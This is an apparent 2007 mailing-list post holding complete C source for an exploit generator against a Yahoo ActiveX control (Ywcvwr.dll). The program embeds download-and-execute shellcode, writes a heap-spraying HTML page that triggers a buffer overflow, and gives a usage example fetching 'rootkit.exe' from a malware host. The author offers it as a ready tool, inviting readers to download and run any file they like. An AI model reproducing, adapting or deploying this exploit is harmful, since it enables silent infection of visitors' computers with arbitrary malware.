<div><U><FONT color=#0000ff></FONT></U>Similar to last but for 2nd file!</div> <div><BR>Compile in LCC-win32 (Free!)</div> <div>Download and exec any file you like!</div> <div>Have Fun!</div> <div> </div> <div> </div> <div>#include <stdio.h><BR>#include <string.h><BR>#include <stdlib.h></div> <div>char *file = "Click_here.html";<BR>FILE *fp = NULL;</div> <div> </div> <div>unsigned char sc[] =</div>
<div>"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"<BR>"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"<BR>"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"<BR>"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"<BR>"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"<BR>"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"<BR>"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"<BR>"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"<BR>"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"<BR>"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"<BR>"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"<BR>"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"<BR>"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";</div> <div> </div> <div><BR>char *url = NULL;<BR>unsigned char sc_2[] = "\x00\x98";</div>
<div><BR>char * header =<BR>"<html>\n"<BR>"<object classid=\"clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277\" id='viewme'></object>\n"<BR>"<body>\n"<BR>"<SCRIPT language=\"javascript\">\n"<BR>"var shellcode = unescape(\"%u9090%u9090%u9090%u9090\" + \n";</div> <div>char * footer =<BR>"\n\n"<BR>"bigblock = unescape(\"%u9090%u9090\");\n"<BR>"headersize = 20;\n"<BR>"slackspace = headersize+shellcode.length;\n"<BR>"while (bigblock.length<slackspace) bigblock+=bigblock;\n"<BR>"fillblock = bigblock.substring(0, slackspace);\n"<BR>"block = bigblock.substring(0, bigblock.length-slackspace);\n"<BR>"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n"<BR>"memory = new Array();\n"<BR>"for (x=0; x<500; x++) memory[x] = block + shellcode;\n"<BR>"var buffer = '\\x0a';\n"<BR>"while (buffer.length < 5000) buffer+='\\x0a\\x0a\\x0a\\x0a';\n"<BR>"viewme.server = buffer;\n"<BR>"viewme.receive();\n";</div> <div><BR>char * trigger_1
=<BR>"</script>\n"<BR>"</body>\n"<BR>"</html>\n";</div> <div><BR>// print unicode shellcode<BR>void PrintPayLoad(char *lpBuff, int buffsize)<BR>{<BR>int i;<BR>for(i=0;i<buffsize;i+=2)<BR>{<BR>if((i%16)==0)<BR>{<BR>if(i!=0)<BR>{<BR>printf("\"\n\"");<BR>fprintf(fp, "%s", "\" +\n\"");<BR>}<BR>else<BR>{<BR>printf("\"");<BR>fprintf(fp, "%s", "\"");<BR>}<BR>}</div> <div>printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);</div> <div>fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);<BR>}</div> <div>printf("\";\n");<BR>fprintf(fp, "%s", "\");\n");</div> <div><BR>fflush(fp);<BR>}</div> <div> </div> <div><BR>void main(int argc, char **argv)<BR>{<BR>unsigned char buf[1024] = {0};</div> <div>int sc_len = 0;<BR>int n;</div> <div><BR>if (argc < 2)<BR>{<BR> printf("\r\nYahoo 0day Ywcvwr.dll ActiveX Exploit #2 Download And
Exec\n");<BR> printf("link:http://research.eeye.com/html/advisories/upcoming/20070605.html\n");<BR> printf("link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 \n");<BR> printf("link:http://secunia.com/advisories/25547/\n");<BR> printf("greetz to Jambalaya for helping with this code\n");<BR> printf("\r\nUsage: %s <URL> [htmlfile]\n", argv[0]);<BR> printf("\r\nE.g.: %s <A href="http://www.malwarehere.com/rootkit.exe">http://www.malwarehere.com/rootkit.exe</A> exploit.html\r\n\n", argv[0]);<BR> printf("=-Excepti0n-=\n");<BR>exit(1);<BR>}</div> <div>url = argv[1];</div> <div><BR>if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)<BR>{<BR>printf("[-] Invalid url. Must start with 'http://','ftp://'\n");<BR>return;<BR>}</div> <div>printf("[+] download <A href="%s\n">url:%s\n</A>", url);</div> <div>if(argc >=3) file = argv[2];<BR>printf("[+] exploit file:%s\n",
file);</div> <div>fp = fopen(file, "w");<BR>if(!fp)<BR>{<BR>printf("[-] Open file error!\n");<BR>return;<BR>}</div> <div><BR>//build Exploit HTML File<BR>fprintf(fp, "%s", header);<BR>fflush(fp);</div> <div>memset(buf, 0, sizeof(buf));<BR>sc_len = sizeof(sc)-1;<BR>memcpy(buf, sc, sc_len);<BR>memcpy(buf+sc_len, url, strlen(url));</div> <div>sc_len += strlen(url);</div> <div>memcpy(buf+sc_len, sc_2, 1);<BR>sc_len += 1;</div> <div>PrintPayLoad((char *)buf, sc_len);</div> <div>fprintf(fp, "%s", footer);<BR>fflush(fp);</div> <div>fprintf(fp, "%s", trigger_1);<BR>fflush(fp);</div> <div><BR>printf("[+] exploit write to %s success!\n", file);<BR>}</div> <div><BR>=-Excepti0n-=</div><p> 
<hr size=1>Boardwalk for $500? In 2007? Ha! <br><a href="http://us.rd.yahoo.com/evt=48223/*http://get.games.yahoo.com/proddesc?gamekey=monopolyherenow">Play Monopoly Here and Now</a> (it's updated for today's economy) at Yahoo! Games.